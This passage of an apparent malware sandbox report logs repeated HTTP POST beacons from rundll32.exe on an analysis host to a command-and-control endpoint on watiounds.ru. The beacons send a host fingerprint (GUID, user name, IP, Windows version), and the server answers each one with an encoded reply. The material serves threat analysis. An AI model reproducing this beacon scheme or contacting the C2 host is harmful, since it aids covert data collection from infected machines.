                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:01.652654886 CEST423INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZTGAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          347192.168.2.224951295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:01.975687981 CEST423OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:02.104321003 CEST424INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 46 55 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHFUSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          348192.168.2.224951395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:02.422961950 CEST424OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:02.547758102 CEST425INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCHSXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          349192.168.2.224951495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:02.862381935 CEST426OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:02.993757963 CEST426INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFMNUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          35192.168.2.224920095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:39.177525997 CEST74OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:39.306526899 CEST75INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 59 42 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFYBUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          350192.168.2.224951595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:03.302946091 CEST427OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:03.428528070 CEST427INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNYBMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          351192.168.2.224951695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:03.745479107 CEST428OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:03.868875027 CEST428INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 46 55 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVFUEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          352192.168.2.224951795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:04.190396070 CEST429OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:04.318844080 CEST429INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 41 5a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMAZNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          353192.168.2.224951895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:04.638921976 CEST430OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:04.764005899 CEST430INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 46 55 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBFUYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          354192.168.2.224951995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:05.100496054 CEST431OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:05.228657007 CEST432INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 54 47 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBTGYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          355192.168.2.224952095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:05.538383007 CEST432OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:05.665273905 CEST433INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZQJAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          356192.168.2.224952195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:05.984097004 CEST433OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:06.107685089 CEST434INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYBYBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          357192.168.2.224952295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:06.445467949 CEST435OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:06.576705933 CEST435INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHTGSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          358192.168.2.224952395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:06.907912016 CEST436OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:07.036864042 CEST436INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 54 47 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYTGBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          359192.168.2.224952495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:07.360558033 CEST437OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:07.490823030 CEST437INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZFUAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          36192.168.2.224920195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:39.636934042 CEST75OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:39.766062975 CEST76INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJAZQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          360192.168.2.224952595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:07.803448915 CEST438OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:07.926779985 CEST438INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFVEUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          361192.168.2.224952695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:08.241230011 CEST439OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:08.362716913 CEST439INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFCXUARRABw==0


